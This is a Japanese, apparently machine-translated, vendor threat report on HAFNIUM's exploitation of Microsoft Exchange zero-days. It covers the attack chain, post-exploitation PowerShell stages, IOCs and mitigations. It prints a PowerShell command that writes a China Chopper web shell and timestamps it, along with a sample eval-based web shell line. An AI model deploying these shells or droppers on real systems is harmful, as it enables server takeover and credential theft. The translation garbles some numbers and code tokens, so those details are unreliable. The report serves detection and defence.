2月XNUMX日、マイクロソフトは、脅威グループ「HAFNIUM」がXNUMXつの ゼロデイ脆弱性 Exchangeサーバーで、Microsoftがアウトオブバンドセキュリティ更新プログラム(CVE-2021-26855、CVE-2021-26857、CVE-2021-26858、CVE-2021-27065)をリリースしました。これにより、攻撃者は有効なアカウント認証情報を知らなくても、メールアカウントにアクセスし、サーバー上でマルウェアを実行できるようになります。
脅威アクターは、Microsoft Exchange CVE-2021-26855 のゼロデイサーバーサイドリクエストフォージェリ(SSRF)脆弱性を悪用しています。これにより、攻撃者は認証を回避し、リモートコード実行が可能になります。
CVE-2021-27065は、認証後の任意のファイル書き込み脆弱性です。この脆弱性は、.aspxという拡張子を持つファイルを作成し、コードを挿入します。攻撃者はこの脆弱性を悪用していました。多くの場合、攻撃者は「China Chopper Web Shell」を侵害されたサーバーにアップロードしていると考えられます。
攻撃チェーン
これらのExchangeサーバーのエクスプロイトには、IOC、Web Shell、またはaspxファイルの侵害を示す指標が付随します。エクスプロイトが成功すると、攻撃者はExchangeサーバーの特定の場所「C:\inetpub\wwwroot\aspnet_client\discover.aspx」にWeb Shellをインストールします。この攻撃では、aspnet_client.aspx、load.aspx、discover.aspx、supp0rt.aspx、acceptable.aspx、error_page.aspx、shell.aspx、logaaa.aspx、dict.aspxなど、一般的な名前のaspxファイルが複数確認されており、オフラインアドレス帳(OAB)ファイルにもWeb Shellが見つかりました。
攻撃者は、Exchangeオフラインアドレス帳のaspxページにコードを挿入し、さらなる攻撃に利用することができます。以下の点が判明しました。 PowerShellの 侵害されたExchangeサーバー上で、疑わしいパラメータを用いて実行されています。このPowerShellコード実行は、脆弱性を悪用してファイルの書き込み/変更が行われていることを示しています。
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -W 隠し -ep バイパス -enc 試してください {$p=”C:\\inetpub\\wwwroot\\aspnet_client\\error.aspx”;
$FileStream=New-ObjectIO.FileStream@($p,[IO.FileMode]::Create); $FileStream.Write([Text.Encoding]::UTF8.GetBytes('外部URL:https://f/
“server”>functionPage_Load(){/*ExchangeService*/eval(Request[“unsafe”],”unsafe”);} '),0,147);if($FileStream){$FileStream.Flush();$FileStream.Dispose();$f=(ls$p);$t=”2015-09-13″;$f.CreationTime=$t;$f.LastAccessTime=$t;$f.LastWriteTime=$t;$f.Attributes=”Readonly”,
「システム」、「隠し」、「インデックスされていないコンテンツ」、「アーカイブ」}} をキャッチします。
Webシェル分析
中国のChopper Web Shellは、これらの攻撃で確認されている小さなワンライナースクリプトです。これらのファイルの内容は奇妙で不完全です。その構造には、evalを呼び出すHTTP GETパラメータ引数や、unsafeなどの単語が含まれており、様々な脆弱性が存在します。
例 -
「https://f/ function Page_Load(){eval(Request [“XOrSeMr3kgWUdFf6″],”unsafe”);} ”
OABファイルのExternalUrlフィールドの構文は、HTTPリクエストから変数を取得し、サーバーを介してコマンドラインを実行するようなものです。「https://f/」は適切な構文ではなく、ランダムな文字パラメータがいくつか見られます。これは、コード実行前の認証に使用されるキーです。上記のケースでは、「XOrSeMr3kgWUdFf6」が重要です。OABファイルでは、WhenChangedフィールドでファイルの変更日時を確認できます。
aspxファイルのスクリーンショット-
図1. ASPXファイル
ウェブシェルファイルで確認されたスクリプトのバリエーションには、オレンジやアナナスなどの静的な文字列や、ファイル内で使用されているBase64文字列のエンコードが含まれています。検出を回避するために、文字列を分割し、Base64文字列でエンコードするといった複雑な処理が用いられています。
図2. 外部URLのリスト
図3. パスのリスト
エクスプロイト後の活動
エクスプロイト発生後、サーバーへの完全なアクセス権を取得するための複数の攻撃試行が開始されたことを確認しています。これには、さまざまなオペレーターがオープンソースのツールや方法を使用してバックドアや多数のマルウェアを埋め込むことが含まれます。
バリアント1:
サーバー上で複数のPowerShellダウンロードが検出されました。最初の PowerShellスクリプト これはbase64でエンコードされたコードで、次のステージをhttp[:]//p.estonine[.]com/p?eからダウンロードします。この次のステージをダウンロードしようとすると、PowerShellスクリプトがダウンロードされることがわかりました。
図4. 最初のPowerShellスクリプト
ダウンロードした PowerShell スクリプトは、base64 エンコードされた式と、高度な難読化技術の Zlib 圧縮コードを呼び出す必要があります。
図5. 次の段階のPS
以下のコードにあるスクリプトをデコード・解凍すると、様々なチェックが行われ、MACアドレス、ウイルス対策ソフト、OSバージョン、ドメイン名、ユーザーなどの情報が収集されます。その後、ハンドはミューテックス「Global\PSEXEC」を作成し、プロセス実行に必要な管理者権限があるかどうかを確認します。ccc.logはCNCサーバーへの接続に関するログです。
図6. PowerShellコードステージ2
このスクリプトは「http[:]//CDN.chatcdn[.]net」へのアクセスを試みます。このドメインは以前から悪意のあるドメインとして認識されており、以前のDLTMinerの拡散ではPowerShellスクリプトで使用されていました。管理者権限で実行している場合は「p?hig」を、それ以外の場合は「p?low」をダウンロードします。その後、Winnetのスケジュールされたタスクの実行間隔を設定します。サーバーが応答しない場合は、IPアドレス「188.166.162.201」からupdate.pngファイルをダウンロードします。
図7. PowerShellコードステージ2
ダウンロードされたファイルはPowerShellスクリプトであり、高度に難読化されたデータが含まれています。コードをデコードすると、約2MBのスクリプトファイルと膨大なコード行が生成されます。このコードには、SMB経由のエクスプロイトに使用されるオープンソースコードが使用されており、SMBセッションセットアップ要求、SMBセッションログオフ要求、invoke-SMBExec、そしていくつかのラテラルムーブメント手法が利用されていることが確認されました。
図8. PowerShell ステージ3
Base64コードのデコード後、コードをさらに調査したところ、Mimikatzのペイロードに類似したXNUMXつの実行ファイルが見つかりました。これは、アカウントのログイン情報とパスワード情報を取得するために使用される、認証情報ダンプを行うオープンソースプログラムです。取得した認証情報は、ラテラルムーブメント(横方向の移動)や、重要情報や制限された情報へのアクセスに利用されます。
バリアント2:
観察された別のPowerShellスクリプトは、GitHubページからファイル download をダウンロードしようとします。ファイルの拡張子は.pngですが、PE実行ファイルです。
図9. PowerShellスクリプトの亜種2
私たちはこのような PowerShell スクリプトについてさらに調査を進めており、感染チェーンでは Microsoft Exchange サーバーの脆弱性を悪用した興味深い事実がいくつか明らかになる予定です。
IOC
| Webshellハッシュ | PEハッシュ |
| 0CD6F96A3460BE65C70C88A764F6EC56 | 3547D371C975779D6E0EDDF145936FB1 |
| 137E3A611C961EF33AAF49CCAA35E710 | 8AEA2AE91CC084731A08AA231E79A430 |
| 1A06924B507FA9A48E94D8AB819C7E42 | 9ff2613df0fc30afbc552f40360c37e7 |
| 1B18EC3D2B27CE39E83D602CB8BA84FE | cad2ee0a2e085a319505c4c4b68b3d2b |
| 1EAC1B6CE217C4BD31E93A3D913AF010 | E438712E336982548B884CBFBFEE6C9E |
| 217747243CB1FB9EAF6999284D7B9FCB | |
| 3068ECC45C32C24C8FD56FC0CB0A8829 | |
| 3446CEEE4BEA404ED72E14E154763428 | |
| 35B332744E614EF07A94FF4AC03B1F1A | |
| 35FCA708A86BEE43F068AD53C289963D | |
| 3CDBE5DF6383A6604737076F9E97E25A | |
| 49A62802887B6CA23FD067B942631698 | |
| 4D0C46CA88840A2649CD0C8596EA0AF9 | |
| 50499D3A3F4A072FD2FA3C5C5E651E25 | |
| 5970381424FB282AD7683431EB38C4B5 | |
| 5DD588C96A81586EE653BDB80D301A87 | |
| 65159FE1E1AE21F68CD235A8C045787A | |
| 6654AA50456B7D7C10061957DA128EF6 | |
| 6B2AEC787E30369911265CFA932192F4 | |
| 6D5F087C1D2E5A98E8EF00FE7883A531 | |
| 6F5909B3060D0F9AD4C4F4F6EFBAAC27 | |
| 87DCB5D6CCD2D614C34197915A9ADE15 | |
| 8B99A15118D4FB563CDEFA97BFEC6BFE | |
| 8CBF320BC0E0BE871E04152AFF775238 | |
| 8D5315AA11C3DBCDDFBA1A8D8D695F6B | |
| 93448E9EC4EEDA337879B148475B0E77 | |
| 94881B3621AF9A4DC64678258364A82B | |
| B82E014EE386C569710A9B03A7294A4C | |
| B86798F8F643CA76F20916C9347AE1C8 | |
| BA7235A228BEB5B8D1C630DA46B17E5F | |
| BEE691F207A19D782CCFBE5887B91015 | |
| C11680638FFF66F5DD494151D4A77389 | |
| CB9BE56C0DA7D625277823C796A10B12 | |
| D02AD7D92D348E011F4C63CBA6BA639D | |
| D08194CBB0D72C2609719C8E87D9036D | |
| D2EE996FBFB6ACA47CFD4319543626A3 | |
| D70FBE37FA09856158361411624591E7 | |
| D8A14C2BC15DC04B0BAE8A992990D41F | |
| DEADBB5A1E9669E268D2C1CC5D9965B0 | |
| E6F23A3282C7F0A693433815B4CFFC8F | |
| EDB48532A2AA88558474FFEA64355129 | |
| EF374AAB0EFFF9914A83362E0896F651 | |
| EFD4DC84D422420E887E6400FECCDDAD | |
| F7D74667839288B659EC1D87217FC749 | |
| FBB4182C9A441688FD71996DE7445A6F |
ドメイン/IP
- http[:]//p.estonine[.]com/p?e
- http[:]//cdn.chatcdn[.]net
- http[:]//40.115.162.72/89[.]png
- https[:]//raw.githubusercontent[.]com/eluken890enlk/exmails/main
-
188.166.162.201
-
178.21.164.68
クイックヒール検出名
- HTTP/CVE-2021-26855.MES!PT
- HTTP/MSExchangeServer.SSRF!PT
- CVE-2021-26855.Webshell
製品概要
脅威アクターは、脆弱な Microsoft Exchange サーバーに対してこれらのゼロデイ脆弱性を悪用し、Exchange サーバーにアクセスしたり制御したりするために、複数のポストエクスプロイト手法を使用するため、最新のセキュリティ更新プログラムでパッチを適用することが不可欠です。
私たち Quick heal は、IPS とファイルベースの検出にこの脆弱性の検出を追加し、すでに侵害されたサーバーと、Web シェルなどの他の IOC の存在を識別しました。
緩和
- すべての Microsoft Exchange サーバーを、Microsoft がリリースした最新のパッチ バージョンに直ちに更新することを強くお勧めします。
- このような攻撃や悪用から保護するには、環境にセキュリティ製品を導入し、適時に更新することをお勧めします。
- ベンダーからのセキュリティ パッチを時間どおりに適用する必要性は、システムの保護とセキュリティ確保に役立ちます。
- サーバーがすでに侵害されている場合は、パッチを適用する前にサーバーをクリーンアップする必要があります。
- マイクロソフトが共有している以下の緩和ツールは、この脆弱性に対して使用できます。
- https://msrc-blog.microsoft.com/2021/03/15/one-click-microsoft-exchange-on-premises-mitigation-tool-march-2021/
- https://github.com/microsoft/CSS-Exchange/tree/main/Security
